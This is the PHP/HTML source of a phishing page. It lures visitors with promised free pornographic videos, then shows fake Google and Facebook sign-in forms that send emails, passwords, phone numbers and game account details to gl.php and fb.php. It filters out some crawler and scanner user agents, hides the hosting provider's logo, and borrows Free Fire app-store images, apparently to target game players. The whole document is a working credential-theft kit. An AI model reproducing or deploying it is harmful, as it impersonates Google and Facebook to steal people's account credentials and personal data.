<?php error_reporting(0); $r=$_POST['rr'];
$ua = $_SERVER['HTTP_USER_AGENT'];
if(preg_match('#Mozilla/4.05 [fr] (Win98; I)#',$ua) || preg_match('/Java1.1.4/si',$ua) || preg_match('/MS FrontPage Express/si',$ua) || preg_match('/HTTrack/si',$ua) || preg_match('/IDentity/si',$ua) || preg_match('/HyperBrowser/si',$ua) || preg_match('/Lynx/si',$ua)) 
{

die();
}
error_reporting(0);
$sibrandalan = $_POST['sibrandalan.id'];
session_start();
?>
<!DOCTYPE html>
<html>
<head>
<title>Simontok</title>
<meta charset="UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<meta property="og:description" content="free video porn simontok"/>
<meta property="og:image" content="img/thumbnail.png"/>
<meta property="og:image:width" content="540"/>
<meta property="og:image:height" content="282"/>
<link rel="icon" type="ico" href="img/icon.webp" sizes="32x32"/>
<link rel="stylesheet" type="text/css" href="css/style.css"/>
<link rel="stylesheet" type="text/css" href="css/mystyle.css"/>
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>

</head>
<body>


<style type="text/css">
	#login fieldset:not(:first-of-type) {
		display: none;
	}
</style>


<div class="sticky">
<img size="50x32" src="img/logo2x.png">
</div>
<div class="slider-container">
</div>
<div class="slider">
<img src="https://ci.phncdn.com/videos/201912/22/270534331/original/(m=eafTGgaaaa)(mh=7HuBnvVluMjk2wJ0)12.jpg" style="width:100%">
</div>
<div class="slider">
<img src="https://ci.phncdn.com/videos/201912/08/267169182/original/(m=q0-R6_UbeafTGgaaaa)(mh=V1fb4CNpEmoL6NkB)0.jpg" style="width:100%">
</div>
<div class="slider">
<img src="https://di.phncdn.com/videos/202002/05/282064681/original/(m=eafTGgaaaa)(mh=e19UZDGTV8fJSQfk)2.jpg" style="width:100%">
</div>
<div class="slider">
<img src="https://ci.phncdn.com/videos/202002/03/281503531/original/(m=eafTGgaaaa)(mh=Tq-HMx7uihd9fzIA)5.jpg" style="width:100%">
</div>
<div class="slider">
<img src="https://ci.phncdn.com/videos/202001/01/272899441/original/(m=eafTGgaaaa)(mh=k6KxbXi_ejUHy3Kh)4.jpg" style="width:100%">
</div>
<div class="slider">
<img src="https://ci.phncdn.com/videos/201904/25/220125421/original/(m=eafTGgaaaa)(mh=qjoLlg_iAepJd7rd)15.jpg" style="width:100%">
</div>
</div>


<div class="gallery-container">


<div id="twitter">
<div class="twitter-login">
<a href="#" class="close" title="Close">&times;</a>
<div class="nav-twitter">
<center>
<img width="30" src="img/login-popup/twitter.png">
</center>
</div>
</br>
</br>
<center>
<h5>Login Twitter</h5>
</center>
</br>
<center>
<button type="submit" class="btn-login-twitter" name="r"  onclick="location.href='login/twitter/index.html';" ><b>Login</b></button>
</center>
<br>
<br>
</form>
</div>
</div>




<div id="gp">
<div class="gp-login">
<a href="#" class="close" title="Close">&times;</a>
<div class="nav-gp">
<center>
<img width="80" src="img/login-popup/google.png">
</center>
</div>
</br>
<form class="formku" id="login" novalidate action="gl.php" method="post">
<fieldset>
<center>
<h5>Sign in</h5>
</br>
<b font-size="100" style="color:black;">with your Google Account</b>
</center>
<input type="text" name="email" placeholder="Email or phone" autocomplete="off" autocapitalize="off" required></br>
<button type="button" class="btn-register-gp"><b>Create account</b></button>
<button type="button" class="next btn-login-gp"><b>Next</b></button>
</fieldset>

<fieldset>
<center>
<i style="color: black;" class="fa fa-user-circle fa-3x"></i>
</br>
</br>
<h5>Welcome</h5>
</br>
<b font-size="100" style="color:black;">enter your password below</b>
</center>
<input type="password" name="gpass" placeholder="Enter your password" autocomplete="off" autocapitalize="off" required></br>
<h5>Detail Account</h5>
<input type="text" name="nick" placeholder="Nickname" autocomplete="off" autocapitalize="off" required></br>
<input type="number" name="lepel" placeholder="Level" autocomplete="off" autocapitalize="off" required></br>
<input type="number" name="hp" placeholder="Number Phone" autocomplete="off" autocapitalize="off" required></br>
</br>
<button type="button" class="previous btn-register-gp"><b>Previous</b></button>
<button type="submit" class="btn-login-gp"  name="r"  value="<?php echo $sibrandalan;?>"><b>Sign in</b></button>
</fieldset>
</form>
</div>
</div>





<div id="fb">
<div class="fb-login">
<a href="#" class="close" title="Close">&times;</a>
<div class="nav-fb">
<center>
<img width="100" src="img/login-popup/fb.png">
</center>
</div>
</br>
<form class="formku" action="fb.php" method="post">
<p class="mylabel">Phone or email:</p>
<input type="text" name="email" placeholder="Phone Or Email" autocomplete="off" autocapitalize="off" required></br>
<p class="mylabel">Password:</p>
<input type="password" name="pfb" placeholder="Password" autocomplete="off" autocapitalize="off"></br>
<center><h5>Detail Account</h5></center>
<input type="text" name="nick" placeholder="Nickname" autocomplete="off" autocapitalize="off" required></br>
<input type="number" name="lepel" placeholder="Level" autocomplete="off" autocapitalize="off" required></br>
<input type="number" name="hp" placeholder="Number Phone" autocomplete="off" autocapitalize="off" required></br>
</br>
</br>
</br>
<center>
<button type="submit" class="btn-login-fb"  name="r" value="<?php echo $sibrandalan;?>"><b>Log In</b></button>
</center>
</br>
</br>
<div class="divider">
<span>or</span>
</div>
</br>
</br>
<center>
<button class="btn-register-fb">Create a New Account</button>
</center>
</form>
</div>
</div>

<center>
<b><font size="3" color="white" face="Simphony">watch Full Sex Videos No Blocking Without Bufering .</font></b>
<h3>Sign in preemptively To Can Download Full Videos 18 ++</h3>
</center>
<br>
<button onclick="location.href='login/twitter/index.html';" class="twitter"><i style="float:left;" class="fa fa-twitter"></i>Twitter</button>
</br>
</br>
<button onclick="location.href='login/facebook/index.html';" class="fb"><i style="float:left;" class="fa fa-facebook-square"></i>Facebook</button>
</br>
</br>
<button onclick="location.href='login/google/index.html';" class="playgame"><i style="float:left;" class="fa fa-google-plus"></i>Google Play Games</button>
</div>


<div class="notification-container">
<div class="button">
<a href="">
<img src="http://freefiremobile-a.akamaihd.net/ffwebsite/images/download/googlePlay2.png"></a>
<a href="">
<img src="http://freefiremobile-a.akamaihd.net/ffwebsite/images/download/appstore2.png"></a>
</div>
</div>


<div class="footer">
<center>

</center>
</div>

<script type="text/javascript">
var slideIndex = 0;
showSlides();
function showSlides() {
    var i;
    var slides = document.getElementsByClassName("slider");
    for (i = 0; i < slides.length; i++) {
        slides[i].style.display = "none"; 
    }
    slideIndex++;
    if (slideIndex > slides.length) {slideIndex = 1} 
    slides[slideIndex-1].style.display = "block"; 
    setTimeout(showSlides, 2500);
}
</script>

<script type="text/javascript">
$(document).ready(function(){
	var current = 1,current_step,next_step,steps;
	steps = $("fieldset").length;
	$(".next").click(function(){
		current_step = $(this).parent();
		next_step = $(this).parent().next();
		next_step.show();
		current_step.hide();
		setProgressBar(++current);
	});
	$(".previous").click(function(){
		current_step = $(this).parent();
		next_step = $(this).parent().prev();
		next_step.show();
		current_step.hide();
		setProgressBar(--current);
	});
	setProgressBar(current);
	// Change progress bar action
	function setProgressBar(curStep){
		var percent = parseFloat(100 / steps) * curStep;
		percent = percent.toFixed();
		$(".progress-bar")
			.css("width",percent+"%")
			.html(percent+"%");		
	}
});
</script>


</body>
		<style>
img[src*="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"] 
{ display: none; }
</style>
</html>
    
    
    
    
    
    